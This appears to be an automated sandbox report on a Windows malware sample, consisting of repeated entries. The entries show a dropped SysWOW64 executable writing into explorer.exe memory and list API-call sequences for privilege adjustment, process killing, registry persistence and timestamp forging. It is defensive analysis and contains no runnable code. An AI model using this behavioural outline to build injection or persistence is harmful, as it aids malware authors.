Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10A90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10AA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10AB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10AC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10AD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10AE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10AF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10B90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10BA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10BB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10BC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10BD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10BE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10BF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 10C80000Jump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe0_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe1_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe1_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileT